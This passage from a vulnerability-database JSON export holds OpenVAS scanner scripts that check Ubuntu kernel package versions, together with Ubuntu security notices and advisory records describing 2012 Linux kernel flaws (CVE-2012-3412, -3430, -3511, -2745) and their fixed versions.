["CVE-2012-3511", "CVE-2012-3412", "CVE-2012-3430"], "modified": "2018-08-17T00:00:00", "id": "OPENVAS:1361412562310841156", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310841156", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: gb_ubuntu_USN_1573_1.nasl 11037 2018-08-17 11:51:16Z cfischer $\n#\n# Ubuntu Update for linux-ec2 USN-1573-1\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (c) 2012 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\ninclude(\"revisions-lib.inc\");\n\n\n\nif(description)\n{\n script_xref(name:\"URL\", value:\"http://www.ubuntu.com/usn/usn-1573-1/\");\n script_oid(\"1.3.6.1.4.1.25623.1.0.841156\");\n script_version(\"$Revision: 11037 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-08-17 13:51:16 +0200 (Fri, 17 Aug 2018) $\");\n script_tag(name:\"creation_date\", value:\"2012-09-22 11:59:38 +0530 (Sat, 22 Sep 2012)\");\n script_cve_id(\"CVE-2012-3412\", \"CVE-2012-3430\", \"CVE-2012-3511\");\n script_tag(name:\"cvss_base\", value:\"7.8\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:N/I:N/A:C\");\n script_xref(name:\"USN\", value:\"1573-1\");\n script_name(\"Ubuntu Update for linux-ec2 USN-1573-1\");\n\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (c) 2012 Greenbone Networks GmbH\");\n script_family(\"Ubuntu Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/ubuntu_linux\", \"ssh/login/packages\", re:\"ssh/login/release=UBUNTU10\\.04 LTS\");\n script_tag(name:\"summary\", value:\"Ubuntu Update for Linux kernel vulnerabilities USN-1573-1\");\n script_tag(name:\"affected\", value:\"linux-ec2 on Ubuntu 10.04 LTS\");\n script_tag(name:\"solution\", value:\"Please Install the Updated Packages.\");\n script_tag(name:\"insight\", value:\"Ben Hutchings reported a flaw in the Linux kernel with some network drivers\n that support TSO (TCP segment offload). A local or peer user could exploit\n this flaw to to cause a denial of service. (CVE-2012-3412)\n\n Jay Fenlason and Doug Ledford discovered a bug in the Linux kernel\n implementation of RDS sockets. A local unprivileged user could potentially\n\n use this flaw to read privileged information from the kernel.\n (CVE-2012-3430)\n\n A flaw was discovered in the madvise feature of the Linux kernel's memory\n subsystem. An unprivileged local use could exploit the flaw to cause a\n denial of service (crash the system). (CVE-2012-3511)\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n\ninclude(\"pkg-lib-deb.inc\");\n\nrelease = dpkg_get_ssh_release();\n\nres = \"\";\nif(release == NULL){\n exit(0);\n}\n\nif(release == \"UBUNTU10.04 LTS\")\n{\n\n if ((res = isdpkgvuln(pkg:\"linux-image-2.6.32-348-ec2\", ver:\"2.6.32-348.54\", rls:\"UBUNTU10.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n", "cvss": {"score": 7.8, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:NONE/A:COMPLETE/"}}, {"lastseen": "2017-12-04T11:19:46", "references": ["http://www.ubuntu.com/usn/usn-1579-1/", "1579-1"], "pluginID": "841148", "description": "Ubuntu Update for Linux kernel vulnerabilities USN-1579-1", "edition": 3, "reporter": "Copyright (c) 2012 Greenbone Networks GmbH", "published": "2012-09-22T00:00:00", "enchantments": {"score": {"vector": "NONE", "value": 7.2}}, "title": "Ubuntu Update for linux USN-1579-1", "type": "openvas", "naslFamily": "Ubuntu Local Security Checks", "bulletinFamily": "scanner", "cvelist": ["CVE-2012-3412", "CVE-2012-3430"], "modified": "2017-12-01T00:00:00", "href": "http://plugins.openvas.org/nasl.php?oid=841148", "id": "OPENVAS:841148", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: gb_ubuntu_USN_1579_1.nasl 7960 2017-12-01 06:58:16Z santu $\n#\n# Ubuntu Update for linux USN-1579-1\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (c) 2012 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\ninclude(\"revisions-lib.inc\");\ntag_insight = \"Ben Hutchings reported a flaw in the Linux kernel with some network drivers\n that support TSO (TCP segment offload). A local or peer user could exploit\n this flaw to to cause a denial of service. (CVE-2012-3412)\n\n Jay Fenlason and Doug Ledford discovered a bug in the Linux kernel\n implementation of RDS sockets. A local unprivileged user could potentially\n use this flaw to read privileged information from the kernel.\n (CVE-2012-3430)\";\n\ntag_summary = \"Ubuntu Update for Linux kernel vulnerabilities USN-1579-1\";\ntag_affected = \"linux on Ubuntu 12.04 LTS\";\ntag_solution = \"Please Install the Updated Packages.\";\n\n\n\nif(description)\n{\n script_xref(name: \"URL\" , value: \"http://www.ubuntu.com/usn/usn-1579-1/\");\n script_id(841148);\n script_version(\"$Revision: 7960 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2017-12-01 07:58:16 +0100 (Fri, 01 Dec 2017) $\");\n script_tag(name:\"creation_date\", value:\"2012-09-22 11:59:13 +0530 (Sat, 22 Sep 2012)\");\n script_cve_id(\"CVE-2012-3412\", \"CVE-2012-3430\");\n script_tag(name:\"cvss_base\", value:\"7.8\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:N/I:N/A:C\");\n script_xref(name: \"USN\", value: \"1579-1\");\n script_name(\"Ubuntu Update for linux USN-1579-1\");\n\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (c) 2012 Greenbone Networks GmbH\");\n script_family(\"Ubuntu Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/ubuntu_linux\", \"ssh/login/packages\");\n script_tag(name : \"summary\" , value : tag_summary);\n script_tag(name : \"affected\" , value : tag_affected);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n\ninclude(\"pkg-lib-deb.inc\");\n\nrelease = get_kb_item(\"ssh/login/release\");\n\nres = \"\";\nif(release == NULL){\n exit(0);\n}\n\nif(release == \"UBUNTU12.04 LTS\")\n{\n\n if ((res = isdpkgvuln(pkg:\"linux-image-3.2.0-31-generic\", ver:\"3.2.0-31.50\", rls:\"UBUNTU12.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-3.2.0-31-generic-pae\", ver:\"3.2.0-31.50\", rls:\"UBUNTU12.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-3.2.0-31-highbank\", ver:\"3.2.0-31.50\", rls:\"UBUNTU12.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-3.2.0-31-omap\", ver:\"3.2.0-31.50\", rls:\"UBUNTU12.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-3.2.0-31-powerpc-smp\", ver:\"3.2.0-31.50\", rls:\"UBUNTU12.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-3.2.0-31-powerpc64-smp\", ver:\"3.2.0-31.50\", rls:\"UBUNTU12.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-3.2.0-31-virtual\", ver:\"3.2.0-31.50\", rls:\"UBUNTU12.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99); # Not vulnerable.\n exit(0);\n}\n", "cvss": {"score": 7.8, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:NONE/A:COMPLETE/"}}, {"lastseen": "2018-09-02T00:01:42", "references": ["1578-1", "http://www.ubuntu.com/usn/usn-1578-1/"], "pluginID": "1361412562310841154", "description": "Ubuntu Update for Linux kernel vulnerabilities USN-1578-1", "edition": 5, "reporter": "Copyright (c) 2012 Greenbone Networks GmbH", "published": "2012-09-22T00:00:00", "title": "Ubuntu Update for linux-ti-omap4 USN-1578-1", "type": "openvas", "enchantments": {"score": {"vector": "NONE", "value": 7.2}}, "naslFamily": "Ubuntu Local Security Checks", "bulletinFamily": "scanner", "cvelist": ["CVE-2012-3412", "CVE-2012-3430"], "modified": "2018-08-17T00:00:00", "id": "OPENVAS:1361412562310841154", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310841154", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: gb_ubuntu_USN_1578_1.nasl 11037 2018-08-17 11:51:16Z cfischer $\n#\n# Ubuntu Update for linux-ti-omap4 USN-1578-1\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (c) 2012 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\ninclude(\"revisions-lib.inc\");\n\n\n\nif(description)\n{\n script_xref(name:\"URL\", value:\"http://www.ubuntu.com/usn/usn-1578-1/\");\n script_oid(\"1.3.6.1.4.1.25623.1.0.841154\");\n script_version(\"$Revision: 11037 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-08-17 13:51:16 +0200 (Fri, 17 Aug 2018) $\");\n script_tag(name:\"creation_date\", value:\"2012-09-22 11:59:32 +0530 (Sat, 22 Sep 2012)\");\n script_cve_id(\"CVE-2012-3412\", \"CVE-2012-3430\");\n script_tag(name:\"cvss_base\", value:\"7.8\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:N/I:N/A:C\");\n script_xref(name:\"USN\", value:\"1578-1\");\n script_name(\"Ubuntu Update for linux-ti-omap4 USN-1578-1\");\n\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (c) 2012 Greenbone Networks GmbH\");\n script_family(\"Ubuntu Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/ubuntu_linux\", \"ssh/login/packages\", re:\"ssh/login/release=UBUNTU11\\.10\");\n script_tag(name:\"summary\", value:\"Ubuntu Update for Linux kernel vulnerabilities USN-1578-1\");\n script_tag(name:\"affected\", value:\"linux-ti-omap4 on Ubuntu 11.10\");\n script_tag(name:\"solution\", value:\"Please Install the Updated Packages.\");\n script_tag(name:\"insight\", value:\"Ben Hutchings reported a flaw in the Linux kernel with some network drivers\n that support TSO (TCP segment offload). A local or peer user could exploit\n this flaw to to cause a denial of service. (CVE-2012-3412)\n\n Jay Fenlason and Doug Ledford discovered a bug in the Linux kernel\n implementation of RDS sockets. A local unprivileged user could potentially\n use this flaw to read privileged information from the kernel.\n (CVE-2012-3430)\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n\ninclude(\"pkg-lib-deb.inc\");\n\nrelease = dpkg_get_ssh_release();\n\nres = \"\";\nif(release == NULL){\n exit(0);\n}\n\nif(release == \"UBUNTU11.10\")\n{\n\n if ((res = isdpkgvuln(pkg:\"linux-image-3.0.0-1216-omap4\", ver:\"3.0.0-1216.28\", rls:\"UBUNTU11.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n", "cvss": {"score": 7.8, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:NONE/A:COMPLETE/"}}], "securityvulns": [{"lastseen": "2018-08-31T11:10:45", "references": [], "description": "\r\n\r\n==========================================================================\r\nUbuntu Security Notice USN-1567-1\r\nSeptember 14, 2012\r\n\r\nlinux vulnerabilities\r\n==========================================================================\r\n\r\nA security issue affects these releases of Ubuntu and its derivatives:\r\n\r\n- Ubuntu 11.04\r\n\r\nSummary:\r\n\r\nSeveral security issues were fixed in the kernel.\r\n\r\nSoftware Description:\r\n- linux: Linux kernel\r\n\r\nDetails:\r\n\r\nA flaw was found in how the Linux kernel passed the replacement session\r\nkeyring to a child process. An unprivileged local user could exploit this\r\nflaw to cause a denial of service &#40;panic&#41;. &#40;CVE-2012-2745&#41;\r\n\r\nBen Hutchings reported a flaw in the Linux kernel with some network drivers\r\nthat support TSO &#40;TCP segment offload&#41;. A local or peer user could exploit\r\nthis flaw to to cause a denial of service. &#40;CVE-2012-3412&#41;\r\n\r\nJay Fenlason and Doug Ledford discovered a bug in the Linux kernel\r\nimplementation of RDS sockets. A local unprivileged user could potentially\r\nuse this flaw to read privileged information from the kernel.\r\n&#40;CVE-2012-3430&#41;\r\n\r\nA flaw was discovered in the madvise feature of the Linux kernel&#39;s memory\r\nsubsystem. An unprivileged local use could exploit the flaw to cause a\r\ndenial of service &#40;crash the system&#41;. &#40;CVE-2012-3511&#41;\r\n\r\nUpdate instructions:\r\n\r\nThe problem can be corrected by updating your system to the following\r\npackage versions:\r\n\r\nUbuntu 11.04:\r\n linux-image-2.6.38-16-generic 2.6.38-16.67\r\n linux-image-2.6.38-16-generic-pae 2.6.38-16.67\r\n linux-image-2.6.38-16-omap 2.6.38-16.67\r\n linux-image-2.6.38-16-powerpc 2.6.38-16.67\r\n linux-image-2.6.38-16-powerpc-smp 2.6.38-16.67\r\n linux-image-2.6.38-16-powerpc64-smp 2.6.38-16.67\r\n linux-image-2.6.38-16-server 2.6.38-16.67\r\n linux-image-2.6.38-16-versatile 2.6.38-16.67\r\n linux-image-2.6.38-16-virtual 2.6.38-16.67\r\n\r\nAfter a standard system update you need to reboot your computer to make\r\nall the necessary changes.\r\n\r\nATTENTION: Due to an unavoidable ABI change the kernel updates have\r\nbeen given a new version number, which requires you to recompile and\r\nreinstall all third party kernel modules you might have installed. If\r\nyou use linux-restricted-modules, you have to update that package as\r\nwell to get modules which work with the new kernel version. Unless you\r\nmanually uninstalled the standard kernel metapackages &#40;e.g. linux-generic,\r\nlinux-server, linux-powerpc&#41;, a standard system upgrade will automatically\r\nperform this as well.\r\n\r\nReferences:\r\n http://www.ubuntu.com/usn/usn-1567-1\r\n CVE-2012-2745, CVE-2012-3412, CVE-2012-3430, CVE-2012-3511\r\n\r\nPackage Information:\r\n https://launchpad.net/ubuntu/+source/linux/2.6.38-16.67\r\n\r\n\r\nAttached Message Part\r\n\r\n\r\n\r\n-- ubuntu-security-announce mailing list ubuntu-security-announce@lists.ubuntu.com Modify settings or unsubscribe at: https://lists.ubuntu.com/mailman/listinfo/ubuntu-security-announce\r\n", "edition": 1, "reporter": "Securityvulns", "published": "2012-09-18T00:00:00", "title": "[USN-1567-1] Linux kernel vulnerabilities", "type": "securityvulns", "enchantments": {"score": {"modified": "2018-08-31T11:10:45", "vector": "NONE", "value": 7.2}}, "bulletinFamily": "software", "affectedSoftware": [], "cvelist": ["CVE-2012-3511", "CVE-2012-2745", "CVE-2012-3412", "CVE-2012-3430"], "modified": "2012-09-18T00:00:00", "id": "SECURITYVULNS:DOC:28560", "href": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:28560", "cvss": {"score": 7.8, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:NONE/A:COMPLETE/"}}], "ubuntu": [{"lastseen": "2018-08-31T00:09:57", "references": ["https://people.canonical.com/~ubuntu-security/cve/CVE-2012-3412", "https://people.canonical.com/~ubuntu-security/cve/CVE-2012-3430", "https://people.canonical.com/~ubuntu-security/cve/CVE-2012-3511", "https://people.canonical.com/~ubuntu-security/cve/CVE-2012-2745"], "affectedPackage": [{"OS": "Ubuntu", "OSVersion": "11.04", "packageVersion": "2.6.38-16.67", "arch": "noarch", "packageFilename": "UNKNOWN", "packageName": "linux-image-2.6.38-16-virtual", "operator": "lt"}, {"OS": "Ubuntu", "OSVersion": "11.04", "packageVersion": "2.6.38-16.67", "arch": "noarch", "packageFilename": "UNKNOWN", "packageName": "linux-image-2.6.38-16-generic-pae", "operator": "lt"}, {"OS": "Ubuntu", "OSVersion": "11.04", "packageVersion": "2.6.38-16.67", "arch": "noarch", "packageFilename": "UNKNOWN", "packageName": "linux-image-2.6.38-16-server", "operator": "lt"}, {"OS": "Ubuntu", "OSVersion": "11.04", "packageVersion": "2.6.38-16.67", "arch": "noarch", "packageFilename": "UNKNOWN", "packageName": "linux-image-2.6.38-16-powerpc", "operator": "lt"}, {"OS": "Ubuntu", "OSVersion": "11.04", "packageVersion": "2.6.38-16.67", "arch": "noarch", "packageFilename": "UNKNOWN", "packageName": "linux-image-2.6.38-16-powerpc-smp", "operator": "lt"}, {"OS": "Ubuntu", "OSVersion": "11.04", "packageVersion": "2.6.38-16.67", "arch": "noarch", "packageFilename": "UNKNOWN", "packageName": "linux-image-2.6.38-16-versatile", "operator": "lt"}, {"OS": "Ubuntu", "OSVersion": "11.04", "packageVersion": "2.6.38-16.67", "arch": "noarch", "packageFilename": "UNKNOWN", "packageName": "linux-image-2.6.38-16-generic", "operator": "lt"}, {"OS": "Ubuntu", "OSVersion": "11.04", "packageVersion": "2.6.38-16.67", "arch": "noarch", "packageFilename": "UNKNOWN", "packageName": "linux-image-2.6.38-16-omap", "operator": "lt"}, {"OS": "Ubuntu", "OSVersion": "11.04", "packageVersion": "2.6.38-16.67", "arch": "noarch", "packageFilename": "UNKNOWN", "packageName": "linux-image-2.6.38-16-powerpc64-smp", "operator": "lt"}], "description": "A flaw was found in how the Linux kernel passed the replacement session keyring to a child process. An unprivileged local user could exploit this flaw to cause a denial of service (panic). (CVE-2012-2745)\n\nBen Hutchings reported a flaw in the Linux kernel with some network drivers that support TSO (TCP segment offload). A local or peer user could exploit this flaw to to cause a denial of service. (CVE-2012-3412)\n\nJay Fenlason and Doug Ledford discovered a bug in the Linux kernel implementation of RDS sockets. A local unprivileged user could potentially use this flaw to read privileged information from the kernel. (CVE-2012-3430)\n\nA flaw was discovered in the madvise feature of the Linux kernel\u2019s memory subsystem. An unprivileged local use could exploit the flaw to cause a denial of service (crash the system). (CVE-2012-3511)", "edition": 3, "reporter": "Ubuntu", "published": "2012-09-14T00:00:00", "title": "Linux kernel vulnerabilities", "type": "ubuntu", "enchantments": {"score": {"vector": "NONE", "value": 7.2}}, "bulletinFamily": "unix", "cvelist": ["CVE-2012-3511", "CVE-2012-2745", "CVE-2012-3412", "CVE-2012-3430"], "modified": "2012-09-14T00:00:00", "id": "USN-1567-1", "href": "https://usn.ubuntu.com/1567-1/", "cvss": {"score": 7.8, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:NONE/A:COMPLETE/"}}, {"lastseen": "2018-08-31T00:09:00", "references": ["https://people.canonical.com/~ubuntu-security/cve/CVE-2012-3412", "https://people.canonical.com/~ubuntu-security/cve/CVE-2012-3430", "https://people.canonical.com/~ubuntu-security/cve/CVE-2012-3511", "https://people.canonical.com/~ubuntu-security/cve/CVE-2012-2745"], "affectedPackage": [{"OS": "Ubuntu", "OSVersion": "10.04", "packageVersion": "2.6.38-16.67~lucid1", "arch": "noarch", "packageFilename": "UNKNOWN", "packageName": "linux-image-2.6.38-16-virtual", "operator": "lt"}, {"OS": "Ubuntu", "OSVersion": "10.04", "packageVersion": "2.6.38-16.67~lucid1", "arch": "noarch", "packageFilename": "UNKNOWN", "packageName": "linux-image-2.6.38-16-generic-pae", "operator": "lt"}, {"OS": "Ubuntu", "OSVersion": "10.04", "packageVersion": "2.6.38-16.67~lucid1", "arch": "noarch", "packageFilename": "UNKNOWN", "packageName": "linux-image-2.6.38-16-generic", "operator": "lt"}, {"OS": "Ubuntu", "OSVersion": "10.04", "packageVersion": "2.6.38-16.67~lucid1", "arch": "noarch", "packageFilename": "UNKNOWN", "packageName": "linux-image-2.6.38-16-server", "operator": "lt"}], "description": "A flaw was found in how the Linux kernel passed the replacement session keyring to a child process. An unprivileged local user could exploit this flaw to cause a denial of service (panic). (CVE-2012-2745)\n\nBen Hutchings reported a flaw in the Linux kernel with some network drivers that support TSO (TCP segment offload). A local or peer user could exploit this flaw to to cause a denial of service. (CVE-2012-3412)\n\nJay Fenlason and Doug Ledford discovered a bug in the Linux kernel implementation of RDS sockets. A local unprivileged user could potentially use this flaw to read privileged information from the kernel. (CVE-2012-3430)\n\nA flaw was discovered in the madvise feature of the Linux kernel\u2019s memory subsystem. An unprivileged local use could exploit the flaw to cause a denial of service (crash the system). (CVE-2012-3511)", "edition": 3, "reporter": "Ubuntu", "published": "2012-09-19T00:00:00", "title": "Linux kernel (Natty backport) vulnerabilities", "type": "ubuntu", "enchantments": {"score": {"vector": "NONE", "value": 7.2}}, "bulletinFamily": "unix", "cvelist": ["CVE-2012-3511", "CVE-2012-2745", "CVE-2012-3412", "CVE-2012-3430"], "modified": "2012-09-19T00:00:00", "id": "USN-1574-1", "href": "https://usn.ubuntu.com/1574-1/", "cvss": {"score": 7.8, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:NONE/A:COMPLETE/"}}, {"lastseen": "2018-08-31T00:10:23", "references": ["https://people.canonical.com/~ubuntu-security/cve/CVE-2012-3412", "https://people.canonical.com/~ubuntu-security/cve/CVE-2012-3430", "https://people.canonical.com/~ubuntu-security/cve/CVE-2012-3511"], "affectedPackage": [{"OS": "Ubuntu", "OSVersion": "10.04", "packageVersion": "2.6.32-43.97", "arch": "noarch", "packageFilename": "UNKNOWN", "packageName": "linux-image-2.6.32-43-powerpc", "operator": "lt"}, {"OS": "Ubuntu", "OSVersion": "10.04", "packageVersion": "2.6.32-43.97", "arch": "noarch", "packageFilename": "UNKNOWN", "packageName": "linux-image-2.6.32-43-sparc64", "operator": "lt"}, {"OS": "Ubuntu", "OSVersion": "10.04", "packageVersion": "2.6.32-43.97", "arch": "noarch", "packageFilename": "UNKNOWN", "packageName": "linux-image-2.6.32-43-lpia", "operator": "lt"}, {"OS": "Ubuntu", "OSVersion": "10.04", "packageVersion": "2.6.32-43.97", "arch": "noarch", "packageFilename": "UNKNOWN", "packageName": "linux-image-2.6.32-43-sparc64-smp", "operator": "lt"}, {"OS": "Ubuntu", "OSVersion": "10.04", "packageVersion": "2.6.32-43.97", "arch": "noarch", "packageFilename": "UNKNOWN", "packageName": "linux-image-2.6.32-43-powerpc-smp", "operator": "lt"}, {"OS": "Ubuntu", "OSVersion": "10.04", "packageVersion": "2.6.32-43.97", "arch": "noarch", "packageFilename": "UNKNOWN", "packageName": "linux-image-2.6.32-43-powerpc64-smp", "operator": "lt"}, {"OS": "Ubuntu", "OSVersion": "10.04", "packageVersion": "2.6.32-43.97", "arch": "noarch", "packageFilename": "UNKNOWN", "packageName": "linux-image-2.6.32-43-virtual", "operator": "lt"}, {"OS": "Ubuntu", "OSVersion": "10.04", "packageVersion": "2.6.32-43.97", "arch": "noarch", "packageFilename": "UNKNOWN", "packageName": "linux-image-2.6.32-43-386", "operator": "lt"}, {"OS": "Ubuntu", "OSVersion": "10.04", "packageVersion": "2.6.32-43.97", "arch": "noarch", "packageFilename": "UNKNOWN", "packageName": "linux-image-2.6.32-43-generic-pae", "operator": "lt"}, {"OS": "Ubuntu", "OSVersion": "10.04", "packageVersion": "2.6.32-43.97", "arch": "noarch", "packageFilename": "UNKNOWN", "packageName": "linux-image-2.6.32-43-generic", "operator": "lt"}, {"OS": "Ubuntu", "OSVersion": "10.04", "packageVersion": "2.6.32-43.97", "arch": "noarch", "packageFilename": "UNKNOWN", "packageName": "linux-image-2.6.32-43-ia64", "operator": "lt"}, {"OS": "Ubuntu", "OSVersion": "10.04", "packageVersion": "2.6.32-43.97", "arch": "noarch", "packageFilename": "UNKNOWN", "packageName": "linux-image-2.6.32-43-preempt", "operator": "lt"}, {"OS": "Ubuntu", "OSVersion": "10.04", "packageVersion": "2.6.32-43.97", "arch": "noarch", "packageFilename": "UNKNOWN", "packageName": "linux-image-2.6.32-43-versatile", "operator": "lt"}, {"OS": "Ubuntu", "OSVersion": "10.04", "packageVersion": "2.6.32-43.97", "arch": "noarch", "packageFilename": "UNKNOWN", "packageName": "linux-image-2.6.32-43-server", "operator": "lt"}], "description": "Ben Hutchings reported a flaw in the Linux kernel with some network drivers that support TSO (TCP segment offload). A local or peer user could exploit this flaw to to cause a denial of service. (CVE-2012-3412)\n\nJay Fenlason and Doug Ledford discovered a bug in the Linux kernel implementation of RDS sockets. A local unprivileged user could potentially use this flaw to read privileged information from the kernel. (CVE-2012-3430)\n\nA flaw was discovered in the madvise feature of the Linux kernel\u2019s memory subsystem. An unprivileged local use could exploit the flaw to cause a denial of service (crash the system). (CVE-2012-3511)", "edition": 3, "reporter": "Ubuntu", "published": "2012-09-19T00:00:00", "title": "Linux kernel vulnerabilities", "type": "ubuntu", "enchantments": {"score": {"vector": "NONE", "value": 2.1}}, "bulletinFamily": "unix", "cvelist": ["CVE-2012-3511", "CVE-2012-3412", "CVE-2012-3430"], "modified": "2012-09-19T00:00:00", "id": "USN-1572-1", "href": "https://usn.ubuntu.com/1572-1/", "cvss": {"score": 7.8, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:NONE/A:COMPLETE/"}}, {"lastseen": "2018-08-31T00:10:02", "references": ["https://people.canonical.com/~ubuntu-security/cve/CVE-2012-3412", "https://people.canonical.com/~ubuntu-security/cve/CVE-2012-3430", "https://people.canonical.com/~ubuntu-security/cve/CVE-2012-3511"], "affectedPackage": [{"OS": "Ubuntu", "OSVersion": "10.04", "packageVersion": "2.6.32-348.54", "arch": "noarch", "packageFilename": "UNKNOWN", "packageName": "linux-image-2.6.32-348-ec2", "operator": "lt"}], "description": "Ben Hutchings reported a flaw in the Linux kernel with some network drivers that support TSO (TCP segment offload). A local or peer user could exploit this flaw to to cause a denial of service. (CVE-2012-3412)\n\nJay Fenlason and Doug Ledford discovered a bug in the Linux kernel implementation of RDS sockets. A local unprivileged user could potentially use this flaw to read privileged information from the kernel. (CVE-2012-3430)\n\nA flaw was discovered in the madvise feature of the Linux kernel\u2019s memory subsystem. An unprivileged local use could exploit the flaw to cause a denial of service (crash the system). (CVE-2012-3511)", "edition": 3, "reporter": "Ubuntu", "published": "2012-09-19T00:00:00", "title": "Linux kernel (EC2) vulnerabilities", "type": "ubuntu", "enchantments": {"score": {"vector": "NONE", "value": 2.1}}, "bulletinFamily": "unix", "cvelist": ["CVE-2012-3511", "CVE-2012-3412", "CVE-2012-3430"], "modified": "2012-09-19T00:00:00", "id": "USN-1573-1", "href": "https://usn.ubuntu.com/1573-1/", "cvss": {"score": 7.8, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:NONE/A:COMPLETE/"}}, {"lastseen": "2018-08-31T00:10:24", "references": ["https://people.canonical.com/~ubuntu-security/cve/CVE-2012-3412", "https://people.canonical.com/~ubuntu-security/cve/CVE-2012-3430"], "affectedPackage": [{"OS": "Ubuntu", "OSVersion": "10.04", "packageVersion": "3.0.0-26.42~lucid1", "arch": "noarch", "packageFilename": "UNKNOWN", "packageName": "linux-image-3.0.0-26-server", "operator": "lt"}, {"OS": "Ubuntu", "OSVersion": "10.04", "packageVersion": "3.0.0-26.42~lucid1", "arch": "noarch", "packageFilename": "UNKNOWN", "packageName": "linux-image-3.0.0-26-generic-pae", "operator": "lt"}, {"OS": "Ubuntu", "OSVersion": "10.04", "packageVersion": "3.0.0-26.42~lucid1", "arch": "noarch", "packageFilename": "UNKNOWN", "packageName": "linux-image-3.0.0-26-virtual", "operator": "lt"}, {"OS": "Ubuntu", "OSVersion": "10.04", "packageVersion": "3.0.0-26.42~lucid1", "arch": "noarch", "packageFilename": "UNKNOWN", "packageName": "linux-image-3.0.0-26-generic", "operator": "lt"}], "description": "Ben Hutchings reported a flaw in the Linux kernel with some network drivers that support TSO (TCP segment offload). A local or peer user could exploit this flaw to to cause a denial of service. (CVE-2012-3412)\n\nJay Fenlason and Doug Ledford discovered a bug in the Linux kernel implementation of RDS sockets. A local unprivileged user could potentially use this flaw to read privileged information from the kernel. (CVE-2012-3430)", "edition": 3, "reporter": 